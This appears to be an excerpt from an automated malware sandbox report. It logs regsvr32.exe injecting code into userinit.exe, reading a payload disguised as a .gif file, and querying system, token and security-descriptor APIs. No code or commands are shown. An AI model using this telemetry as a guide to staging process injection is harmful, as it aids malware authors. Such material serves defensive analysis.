PID	0x854
Parent PID	0xf18 (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 860 0x 818 0x 814

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x0006ffff	Private Memory	rw	-
pagefile_0x0000000000070000	0x00070000	0x00073fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000080000	0x00080000	0x00080fff	Pagefile Backed Memory	r	-
locale.nls	0x00090000	0x000f6fff	Memory Mapped File	r	-
pagefile_0x0000000000100000	0x00100000	0x001c7fff	Pagefile Backed Memory	r	-
private_0x00000000001d0000	0x001d0000	0x001d0fff	Private Memory	rw	-
private_0x00000000001e0000	0x001e0000	0x001effff	Private Memory	rw	-
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	rwx	-
pagefile_0x0000000000200000	0x00200000	0x00206fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000210000	0x00210000	0x00211fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00220000	0x00220fff	Memory Mapped File	r	-
private_0x0000000000230000	0x00230000	0x00230fff	Private Memory	rwx	-
pagefile_0x0000000000240000	0x00240000	0x00241fff	Pagefile Backed Memory	r	-
private_0x0000000000250000	0x00250000	0x0034ffff	Private Memory	rw	-
private_0x0000000000350000	0x00350000	0x003cffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
private_0x0000000000680000	0x00680000	0x0068ffff	Private Memory	rw	-
userinit.exe	0x006d0000	0x006d8fff	Memory Mapped File	rwx	-
pagefile_0x00000000006e0000	0x006e0000	0x012dffff	Pagefile Backed Memory	r	-
private_0x00000000012e0000	0x012e0000	0x0146ffff	Private Memory	rw	-
pagefile_0x00000000012e0000	0x012e0000	0x013befff	Pagefile Backed Memory	r	-
private_0x0000000001430000	0x01430000	0x0146ffff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x015affff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0156ffff	Private Memory	rw	-
private_0x0000000001570000	0x01570000	0x015affff	Private Memory	rw	-
staticcache.dat	0x015b0000	0x01edffff	Memory Mapped File	r	-
pagefile_0x0000000001ee0000	0x01ee0000	0x022d2fff	Pagefile Backed Memory	r	-
private_0x00000000022e0000	0x022e0000	0x023ecfff	Private Memory	rw	-
private_0x00000000023f0000	0x023f0000	0x025effff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x02670fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x02674fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x02678fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x0267cfff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x02682fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x02686fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x0268afff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x0268efff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x02694fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x02698fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x0269cfff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026a2fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026a6fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026aafff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026aefff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026b4fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026b8fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026bcfff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026c2fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026c6fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026cafff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026cefff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026d4fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026d8fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026dcfff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026e2fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026e6fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026eafff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026eefff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026f4fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026f8fff	Private Memory	rw	-
private_0x00000000025f0000	0x025f0000	0x026fcfff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02702fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x02706fff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0270afff	Private Memory	rw	-
private_0x0000000002680000	0x02680000	0x0270efff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02724fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02728fff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x0272cfff	Private Memory	rw	-
private_0x0000000002690000	0x02690000	0x02730fff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x02746fff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x0274afff	Private Memory	rw	-
private_0x00000000026a0000	0x026a0000	0x0274efff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02764fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02768fff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x0276cfff	Private Memory	rw	-
private_0x00000000026b0000	0x026b0000	0x02770fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x02786fff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x0278afff	Private Memory	rw	-
private_0x00000000026c0000	0x026c0000	0x0278efff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027a4fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027a8fff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027acfff	Private Memory	rw	-
private_0x00000000026d0000	0x026d0000	0x027b0fff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x027c6fff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x027cafff	Private Memory	rw	-
private_0x00000000026e0000	0x026e0000	0x027cefff	Private Memory	rw	-
private_0x00000000026f0000	0x026f0000	0x027e4fff	Private Memory	rw	-
private_0x00000000026f0000	0x026f0000	0x027e8fff	Private Memory	rw	-
private_0x00000000026f0000	0x026f0000	0x027ecfff	Private Memory	rw	-
private_0x00000000026f0000	0x026f0000	0x027f0fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x02806fff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0280afff	Private Memory	rw	-
private_0x0000000002700000	0x02700000	0x0280ffff	Private Memory	-	-
private_0x0000000002710000	0x02710000	0x027a0fff	Private Memory	rw	-
private_0x0000000002740000	0x02740000	0x027e2fff	Private Memory	rw	-
private_0x0000000002750000	0x02750000	0x02800fff	Private Memory	rw	-
private_0x0000000002780000	0x02780000	0x02842fff	Private Memory	rw	-
private_0x0000000002790000	0x02790000	0x02860fff	Private Memory	rw	-
private_0x00000000027c0000	0x027c0000	0x028a2fff	Private Memory	rw	-
private_0x00000000027d0000	0x027d0000	0x028c0fff	Private Memory	rw	-
private_0x0000000002800000	0x02800000	0x02902fff	Private Memory	rw	-
private_0x0000000002810000	0x02810000	0x02922fff	Private Memory	rwx	-
private_0x0000000002930000	0x02930000	0x02a2ffff	Private Memory	-	-
private_0x0000000002ae0000	0x02ae0000	0x02b1ffff	Private Memory	rw	-
private_0x0000000002b50000	0x02b50000	0x02c4ffff	Private Memory	rw	-
sortdefault.nls	0x02c50000	0x02f1efff	Memory Mapped File	r	-
comctl32.dll	0x6cc60000	0x6cce3fff	Memory Mapped File	rwx	-
olepro32.dll	0x6cea0000	0x6ceb8fff	Memory Mapped File	rwx	-
oleacc.dll	0x71bf0000	0x71c2bfff	Memory Mapped File	rwx	-
dwmapi.dll	0x733b0000	0x733c2fff	Memory Mapped File	rwx	-
uxtheme.dll	0x736a0000	0x736dffff	Memory Mapped File	rwx	-
wkscli.dll	0x73af0000	0x73afefff	Memory Mapped File	rwx	-
netutils.dll	0x73b00000	0x73b08fff	Memory Mapped File	rwx	-
netapi32.dll	0x73b10000	0x73b20fff	Memory Mapped File	rwx	-
comctl32.dll	0x73e90000	0x7402dfff	Memory Mapped File	rwx	-
version.dll	0x745c0000	0x745c8fff	Memory Mapped File	rwx	-
srvcli.dll	0x74f10000	0x74f28fff	Memory Mapped File	rwx	-
msasn1.dll	0x750e0000	0x750ebfff	Memory Mapped File	rwx	-
crypt32.dll	0x751b0000	0x752ccfff	Memory Mapped File	rwx	-
kernelbase.dll	0x75320000	0x75369fff	Memory Mapped File	rwx	-
kernel32.dll	0x75370000	0x75443fff	Memory Mapped File	rwx	-
lpk.dll	0x754b0000	0x754b9fff	Memory Mapped File	rwx	-
iertutil.dll	0x754c0000	0x756bafff	Memory Mapped File	rwx	-
msvcrt.dll	0x75700000	0x757abfff	Memory Mapped File	rwx	-
user32.dll	0x757b0000	0x75878fff	Memory Mapped File	rwx	-
gdi32.dll	0x75880000	0x758cdfff	Memory Mapped File	rwx	-
sechost.dll	0x758d0000	0x758e8fff	Memory Mapped File	rwx	-
oleaut32.dll	0x758f0000	0x7597efff	Memory Mapped File	rwx	-
msctf.dll	0x759b0000	0x75a7bfff	Memory Mapped File	rwx	-
urlmon.dll	0x75a80000	0x75bb5fff	Memory Mapped File	rwx	-
usp10.dll	0x75bc0000	0x75c5cfff	Memory Mapped File	rwx	-
shlwapi.dll	0x768c0000	0x76916fff	Memory Mapped File	rwx	-
wininet.dll	0x76920000	0x76a14fff	Memory Mapped File	rwx	-
ole32.dll	0x76a20000	0x76b7bfff	Memory Mapped File	rwx	-
advapi32.dll	0x76da0000	0x76e3ffff	Memory Mapped File	rwx	-
imm32.dll	0x76e40000	0x76e5efff	Memory Mapped File	rwx	-
rpcrt4.dll	0x76e60000	0x76f00fff	Memory Mapped File	rwx	-
ntdll.dll	0x76f20000	0x7705bfff	Memory Mapped File	rwx	-
apisetschema.dll	0x77160000	0x77160fff	Memory Mapped File	rwx	-
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	r	-
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	r	-
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	rw	-
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	rw	-
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	rw	-
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	rw	-
For performance reasons, the remaining 20 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

»

Injection Type	Source Process	Source Os Thread ID	Information	Count	Logfile
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x400000, size = 405504	1	Fn Data
Modify Memory	#25: c:\windows\system32\regsvr32.exe	0xf1c	address = 0x7ffda008, size = 4	1	Fn Data
Modify Control Flow	#25: c:\windows\system32\regsvr32.exe	0xf1c	os_tid = 0x860, address = 0x76f67098	1	Fn

Host Behavior

File (2)

»

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\ProgramData\tempa\marxvxinhhmg.gif	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ		1	Fn
Read	C:\ProgramData\tempa\marxvxinhhmg.gif	size = 1097216, size_out = 1097216		1	Fn

Registry (6)

»

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Borland\Locales	-	2	Fn
Open Key	HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	-	2	Fn

Module (191)

»

Operation	Module	Additional Information	Count	Logfile
Load	C:\Windows\System32\userinit.ENU	base_address = 0x0	1	Fn
Load	C:\Windows\System32\userinit.EN	base_address = 0x0	1	Fn
Load	olepro32.dll	base_address = 0x6cea0000	1	Fn
Load	netapi32.dll	base_address = 0x73b10000	1	Fn
Load	OLEAUT32.DLL	base_address = 0x758f0000	1	Fn
Get Handle	private_0x0000000000400000	base_address = 0x400000	1	Fn
Get Handle	c:\windows\system32\kernel32.dll	base_address = 0x75370000	13	Fn
Get Handle	c:\windows\system32\oleaut32.dll	base_address = 0x758f0000	2	Fn
Get Handle	c:\windows\system32\user32.dll	base_address = 0x757b0000	6	Fn
Get Handle	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	base_address = 0x6cc60000	2	Fn
Get Handle	c:\windows\system32\ole32.dll	base_address = 0x76a20000	1	Fn
Get Handle	netapi32.dll	base_address = 0x0	1	Fn
Get Handle	c:\windows\system32\netapi32.dll	base_address = 0x73b10000	1	Fn
Get Handle	c:\windows\system32\advapi32.dll	base_address = 0x76da0000	19	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	private_0x0000000000400000	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	-	process_name = c:\windows\system32\userinit.exe, file_name_orig = ó, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	1	Fn
Get Filename	C:\Windows\System32\userinit.EN	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 256	1	Fn
Get Filename	netapi32.dll	process_name = c:\windows\system32\userinit.exe, file_name_orig = C:\Windows\System32\userinit.exe, size = 261	12	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x753ff46f	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x758f4c28	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNeg, address_out = 0x7596c802	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarNot, address_out = 0x7596ec66	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAdd, address_out = 0x75915934	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarSub, address_out = 0x7596d332	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMul, address_out = 0x7596dbd4	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDiv, address_out = 0x7596e405	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarIdiv, address_out = 0x7596f00a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarMod, address_out = 0x7596f15e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarAnd, address_out = 0x75915a98	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarOr, address_out = 0x7596ecfa	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarXor, address_out = 0x7596ee2e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCmp, address_out = 0x7590b0dc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarI4FromStr, address_out = 0x75906fab	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR4FromStr, address_out = 0x759101a0	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarR8FromStr, address_out = 0x7590699e	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarDateFromStr, address_out = 0x75916ba7	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarCyFromStr, address_out = 0x75936c12	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBoolFromStr, address_out = 0x7590dbd1	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75917fdc	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75907a2a	2	Fn
Get Address	c:\windows\system32\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75910355	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetMonitorInfoA, address_out = 0x757bc34e	2	Fn
Get Address	c:\windows\system32\user32.dll	function = GetSystemMetrics, address_out = 0x757c67cf	2	Fn
Get Address	c:\windows\system32\user32.dll	function = EnumDisplayMonitors, address_out = 0x757c34a3	2	Fn
Get Address	c:\windows\system32\user32.dll	function = AnimateWindow, address_out = 0x757e0620	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = InitializeFlatSB, address_out = 0x6cc9266f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = UninitializeFlatSB, address_out = 0x6cc92542	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollProp, address_out = 0x6cc91d29	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollProp, address_out = 0x6cc9238d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_EnableScrollBar, address_out = 0x6cc920c9	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_ShowScrollBar, address_out = 0x6cc91fdb	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollRange, address_out = 0x6cc91e8d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollInfo, address_out = 0x6cc91f0f	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_GetScrollPos, address_out = 0x6cc91ccd	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollPos, address_out = 0x6cc9216d	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollInfo, address_out = 0x6cc922be	2	Fn
Get Address	c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll	function = FlatSB_SetScrollRange, address_out = 0x6cc921e2	2	Fn
Get Address	c:\windows\system32\user32.dll	function = SetLayeredWindowAttributes, address_out = 0x757ba6dc	2	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoCreateInstanceEx, address_out = 0x76a69d4e	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoInitializeEx, address_out = 0x76a609ad	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoAddRefServerProcess, address_out = 0x76a83cf3	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoReleaseServerProcess, address_out = 0x76a84314	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoResumeClassObjects, address_out = 0x76a2ea02	1	Fn
Get Address	c:\windows\system32\ole32.dll	function = CoSuspendClassObjects, address_out = 0x76a8bb02	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePropertyFrame, address_out = 0x6cea20ea	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreateFontIndirect, address_out = 0x6cea20b7	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleCreatePictureIndirect, address_out = 0x6cea20c8	1	Fn
Get Address	c:\windows\system32\olepro32.dll	function = OleLoadPicture, address_out = 0x6cea20d9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetVersionExA, address_out = 0x753c3861	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetServerGetInfo, address_out = 0x74f13cfa	1	Fn
Get Address	c:\windows\system32\netapi32.dll	function = NetApiBufferFree, address_out = 0x73b013d2	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LocalFree, address_out = 0x753bca64	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentThread, address_out = 0x753c3351	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenThreadToken, address_out = 0x76db432c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCurrentProcess, address_out = 0x753bcdcf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = OpenProcessToken, address_out = 0x76db4304	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = MapGenericMask, address_out = 0x76dc7a73	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetTokenInformation, address_out = 0x76db431c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetLastError, address_out = 0x753bbf00	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapAlloc, address_out = 0x76f72dd6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = HeapFree, address_out = 0x753bbbd0	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x753bca7c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityInfo, address_out = 0x76dab3e4	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorControl, address_out = 0x76daaddf	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorOwner, address_out = 0x76daadf7	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorGroup, address_out = 0x76daae27	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorDacl, address_out = 0x76db41a6	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = IsValidAcl, address_out = 0x76da8523	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetAce, address_out = 0x76db45f0	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSecurityDescriptorSacl, address_out = 0x76db4608	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetLengthSid, address_out = 0x76db413b	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalAlloc, address_out = 0x753b9ce1	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = InitializeAcl, address_out = 0x76db45cd	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = SetLastError, address_out = 0x753bbb08	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthorityCount, address_out = 0x76db0e0c	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidIdentifierAuthority, address_out = 0x76daa935	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetSidSubAuthority, address_out = 0x76db0e24	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = AddAce, address_out = 0x76daae0f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GlobalFree, address_out = 0x753b9cf9	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = SetSecurityInfo, address_out = 0x76da9edf	1	Fn

Window (3)

»

Operation	Window Name	Additional Information	Count	Logfile
Create	userinit	class_name = TApplication, wndproc_parameter = 0	1	Fn
Find	marxvxinhhm0131	-	1	Fn
Set Attribute	userinit	class_name = TApplication, index = 18446744073709551612, new_long = 2035695	1	Fn

Keyboard (6)

»

Operation	Additional Information	Count	Logfile
Get Info	type = 0, result_out = 4	2	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	2	Fn
Get Info	type = KB_LOCALE_ID	2	Fn

System (10)

»

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = CRH2YWU7	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = Operating System	3	Fn

Process #37: userinit.exe

222

0

»

Information	Value
ID	#37
File Name	c:\windows\system32\userinit.exe
Command Line	"C:\Windows\System32\userinit.exe"
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:02:07, Reason: Child Process
Unmonitor	End Time: 00:02:11, Reason: Self Terminated
Monitor Duration	00:00:04

OS Process Information

»

Information	Value
PID	0x824
Parent PID	0xf0c (c:\windows\system32\regsvr32.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	CRH2YWU7\EEBsYm5
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 764 0x 7D8 0x 264

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00033fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00040fff	Pagefile Backed Memory	r	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x00090fff	Private Memory	rw	-
private_0x00000000000a0000	0x000a0000	0x000a0fff	Private Memory	rwx	-
private_0x00000000000b0000	0x000b0000	0x001affff	Private Memory	rw	-
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	r	-
pagefile_0x0000000000220000	0x00220000	0x002e7fff	Pagefile Backed Memory	r	-
private_0x00000000002f0000	0x002f0000	0x0035ffff	Private Memory	rw	-
pagefile_0x00000000002f0000	0x002f0000	0x002f6fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000300000	0x00300000	0x00301fff	Pagefile Backed Memory	rw	-
oleaccrc.dll	0x00310000	0x00310fff	Memory Mapped File	r	-
private_0x0000000000320000	0x00320000	0x0035ffff	Private Memory	rw	-
private_0x0000000000360000	0x00360000	0x00360fff	Private Memory	rwx	-
private_0x0000000000370000	0x00370000	0x0037ffff	Private Memory	rw	-
private_0x0000000000380000	0x00380000	0x003fffff	Private Memory	rw	-
private_0x0000000000400000	0x00400000	0x00462fff	Private Memory	rwx	-
pagefile_0x0000000000470000	0x00470000	0x00570fff	Pagefile Backed Memory	r	-
private_0x0000000000580000	0x00580000	0x0067ffff	Private Memory	-	-
pagefile_0x0000000000680000	0x00680000	0x00681fff	Pagefile Backed Memory	r	-
userinit.exe	0x006d0000	0x006d8fff	Memory Mapped File	rwx	-
pagefile_0x00000000006e0000	0x006e0000	0x012dffff	Pagefile Backed Memory	r	-
pagefile_0x00000000012e0000	0x012e0000	0x013befff	Pagefile Backed Memory	r	-
private_0x00000000013c0000	0x013c0000	0x01440fff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x01444fff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x01448fff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x0144cfff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x01450fff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x01454fff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x01458fff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x0145cfff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x01460fff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x01464fff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x01468fff	Private Memory	rw	-
private_0x00000000013c0000	0x013c0000	0x0146cfff	Private Memory	rw	-
private_0x0000000001470000	0x01470000	0x0147ffff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x0153ffff	Private Memory	rw	-
private_0x0000000001480000	0x01480000	0x014bffff	Private Memory	rw	-
private_0x0000000001500000	0x01500000	0x0153ffff	Private Memory	rw	-
staticcache.dat	0x01540000	0x01e6ffff	Memory Mapped File	r	-
pagefile_0x0000000001e70000	0x01e70000	0x02262fff	Pagefile Backed Memory	r	-
private_0x0000000002270000	0x02270000	0x0237cfff	Private Memory	rw	-
private_0x0000000002380000	0x02380000	0x0247ffff	Private Memory	rw	-
private_0x0000000002480000	0x02480000	0x0267ffff	Private Memory	rw	-
